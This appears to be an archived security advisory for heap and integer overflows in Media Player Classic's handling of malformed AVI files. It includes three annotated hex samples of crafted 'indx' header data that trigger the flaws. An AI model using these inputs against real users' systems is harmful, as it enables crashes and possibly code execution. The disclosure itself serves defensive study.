32 lines
No EOL
1.1 KiB
Text
Executable file
32 lines
No EOL
1.1 KiB
Text
Executable file
source: http://www.securityfocus.com/bid/25650/info
|
|
|
|
Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files.
|
|
|
|
An attacker can exploit these issues to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
|
|
|
|
Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected.
|
|
|
|
The following examples of AVI header data are available:
|
|
|
|
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
|
|
|
|
indx truck size 0xffffffff
|
|
wLongsPerEntry 0x0001
|
|
BIndexSubType is 0x64
|
|
bIndexType is 0x73
|
|
nEntriesInuse is 0x10000020
|
|
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
|
|
|
|
indx truck size 0xffffff00
|
|
wLongsPerEntry 0xffff
|
|
BIndexSubType is 0x64
|
|
bIndexType is 0x73
|
|
nEntriesInuse is 0xFFFFFFFF
|
|
|
|
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
|
|
|
|
indx truck size 0xffffff00
|
|
wLongsPerEntry 0x0001
|
|
BIndexSubType is 0x64
|
|
bIndexType is 0x73
|
|
nEntriesInuse is 0x10000020 |